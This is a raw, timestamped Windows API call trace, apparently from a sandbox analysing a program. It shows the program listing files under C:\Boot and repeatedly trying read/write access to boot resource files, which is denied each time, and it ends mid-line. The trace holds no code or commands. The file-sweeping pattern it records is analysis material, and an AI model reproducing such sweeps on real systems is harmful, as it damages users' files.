[0069.552] FindFirstFileExW (in: lpFileName="C:\\Boot\\es-ES\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78590 [0069.552] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.552] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0069.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0069.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.553] AreFileApisANSI () returned 1 [0069.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-ES\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.553] AreFileApisANSI () returned 1 [0069.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0069.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 30 [0069.554] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.554] GetFileType (hFile=0x418) returned 0x1 [0069.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.554] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.554] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.554] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.554] CloseHandle (hObject=0x418) returned 1 [0069.554] AreFileApisANSI () returned 1 [0069.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0069.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 30 [0069.555] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.555] GetLastError () returned 0x5 [0069.555] GetLastError () returned 0x5 [0069.555] SetLastError (dwErrCode=0x5) [0069.555] GetLastError () returned 0x5 [0069.555] SetLastError (dwErrCode=0x5) [0069.555] GetLastError () returned 0x5 [0069.555] SetLastError (dwErrCode=0x5) [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.555] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0069.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.556] AreFileApisANSI () returned 1 [0069.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-ES\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-ES\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.556] AreFileApisANSI () returned 1 [0069.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0069.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-ES\\memtest.exe.mui") returned 30 [0069.556] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.557] GetFileType (hFile=0x418) returned 0x1 [0069.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.557] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.557] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.558] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.558] CloseHandle (hObject=0x418) returned 1 [0069.558] AreFileApisANSI () returned 1 [0069.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-ES\\memtest.exe.mui") returned 30 [0069.558] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.558] GetLastError () returned 0x5 [0069.558] GetLastError () returned 0x5 [0069.558] SetLastError (dwErrCode=0x5) [0069.558] GetLastError () returned 0x5 [0069.558] SetLastError (dwErrCode=0x5) [0069.558] GetLastError () returned 0x5 [0069.558] SetLastError (dwErrCode=0x5) [0069.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.559] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69218, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓뎠")) returned 0 [0069.559] FindClose (in: hFindFile=0x78590 | out: hFindFile=0x78590) returned 1 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.559] AreFileApisANSI () returned 1 [0069.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-MX", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-MX", lpUsedDefaultChar=0x0) returned 14 [0069.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0069.560] AreFileApisANSI () returned 1 [0069.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0069.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\es-MX") returned 14 [0069.560] CreateFileW (lpFileName="C:\\Boot\\es-MX" (normalized: "c:\\boot\\es-mx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.560] GetLastError () returned 0x5 [0069.560] GetLastError () returned 0x5 [0069.560] SetLastError (dwErrCode=0x5) [0069.560] GetLastError () returned 0x5 [0069.560] SetLastError (dwErrCode=0x5) [0069.560] GetLastError () returned 0x5 [0069.560] SetLastError (dwErrCode=0x5) [0069.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.560] AreFileApisANSI () returned 1 [0069.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88388 [0069.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88388, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\es-MX") returned 14 [0069.560] CreateFileW (lpFileName="C:\\Boot\\es-MX" (normalized: "c:\\boot\\es-mx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.561] GetLastError () returned 0x5 [0069.561] GetLastError () returned 0x5 [0069.561] SetLastError (dwErrCode=0x5) [0069.561] GetLastError () returned 0x5 [0069.561] SetLastError (dwErrCode=0x5) [0069.561] GetLastError () returned 0x5 [0069.561] SetLastError (dwErrCode=0x5) [0069.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.561] 